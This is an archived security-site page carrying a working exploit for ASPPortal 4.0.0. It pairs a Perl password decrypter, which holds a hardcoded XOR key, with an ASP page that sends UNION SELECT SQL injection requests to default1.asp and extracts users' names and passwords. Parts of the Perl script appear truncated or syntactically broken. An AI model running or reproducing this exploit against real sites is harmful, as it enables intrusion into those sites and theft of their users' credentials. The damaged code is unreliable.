Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: b06-5721.htm

ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit



ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit
ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit



Perl Script Decode:

#!/usr/bin/perl
#AspPortal Password Decrypter
#Get pass exploit.asp and this copy this window
#Speical Thanks To::: Nukedx ,For ASPPORTAL Decrypter
#ajann
if(@1 = 1) { exploit(); }

sub decrypt ()
{
  $lp = length($appass);
$apkey = "IY/;\$>=3)?^-+7M32#Q]VOII.Q=OFMC`:P7_B;#,+.AW_/+']DIB;2DTIA57TT&-)O'/*F'M>H.XH5W^0Y*=71+5*^`^PKJ(=E/X#7A:?,S>R&T;+B#<:-*\@)X9F`_`%QA3Z95.?_T#1,\$2#FWW5PBH^*<])A(S0@AVD8C^Q0R^T1D?(1+,YE71X+.*+U\$:3XO^Q].KG&0N0];[LJ 
  if ($lp == 0) { die("- An error occurued\r\n"); }
  for ($i = 0; $i < $lp ; $i++) {
    $f = $lp - $i - 1; # Formula for getting character via substr...
    $n = substr($apkey,$f,1);
    $l = substr($appass,$f,1);
    $appwd = chr(ord($n)^ord($l)).$appwd;
  }
  print "- Password decrypted as: $appwd\r\n";
  exit();
}
sub exploit () 
{
      print "Password?: ";
      $kroo = ;
      chop ($kroo);
      $appass = $kroo;
      $appass =~ s/(")/chr(34)/eg;
      $appass =~ s/(<)/chr(60)/eg;
      $appass =~ s/(>)/chr(62)/eg;
      $appass =~ s/( )/chr(32)/eg;
      decrypt();
    exit(); 
}



Exploit:


<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>

<%

'=============================================================================================='[Script Name: ASPPortal <= 4.0.0(default1.asp) Remote SQL Injection Exploit
'[Coded by   : ajann
'[Author   : ajann
'[Contact    : :(
'[ExploitName: exploit1.asp

'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'[Using : Tr:Al=FDnan Sifreyi Perl scriptinde c=F6z=FCn.
'[Using : Tr:Scriptin Tr Dilinde bu exploitle bilgileri alamassiniz,manuel cekebilirsiniz
'[Using : Tr:Kimsenin boyle yapicak kadar seviyesiz oldunu d=FCs=FCnm=FCyorum.
'=============================================================================================='use sub decrypt() from http://www.milw0rm.com/exploits/1597 to decrypt /str0ke 

%>


ASPPortal <= 4.0.0 (default1.asp) Remote SQL Injection Exploit









ASPPortal <=v4.0.0(default1.asp) Remote SQL Injection Exploit

color="#FFFFFF">TARGET:Example:[http://x.com/path]

USER ID:Example:[User ID=1]

value="http://" size="25" style="background-color: #808080">
<% islem = Request.QueryString("islem") If islem = "hata1" Then Response.Write "There is a problem! Please complete to the whole spaces" End If If islem = "hata2" Then Response.Write "There is a problem! Please right character use" End If If islem = "hata3" Then Response.Write "There is a problem! Add ""http://""" End If %> <% If islem = "get" Then string1="default1.asp" string2="default1.asp" cek= Request.Form("id") targettext = Request.Form("text1") arama=InStr(1, targettext, "union" ,1) arama2=InStr(1, targettext, "http://" ,1) If targettext="" Then Response.Redirect("exploit1.asp?islem=hata1") Else If arama>0 then Response.Redirect("exploit1.asp?islem=hata2") Else If arama2=0 then Response.Redirect("exploit1.asp?islem=hata3") Else %> <% target1 = targettext+string1 target2 = targettext+string2 Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "POST" , come, FALSE .setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .send "Voteit=1&Poll_ID=-1%20union%20select%200,username,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek take = .Responsetext End With SET objtake = Nothing End Function Public Function take1(come1) Set objtake1 = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake1 .Open "POST" , come1, FALSE .setRequestHeader "Content-Type", "application/x-www-form-urlencoded" .send "Voteit=1&Poll_ID=-1%20union%20select%200,password,0,0,0,0,0,0,0%20from%20users%20where%20user_id%20like%20"+cek take1 = .Responsetext End With SET objtake1 = Nothing End Function get_username = take(target1) get_password = take1(target2) getdata=InStr(get_username,"Poll Question:
 " ) username=Mid(get_username,getdata+24,14) passwd=Mid(get_password,getdata+24,14) %>
ajann
             User Name:  <%=username%>
             User Password:  <%=passwd%>

<% End If End If End If End If Set objtake = Nothing %>


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH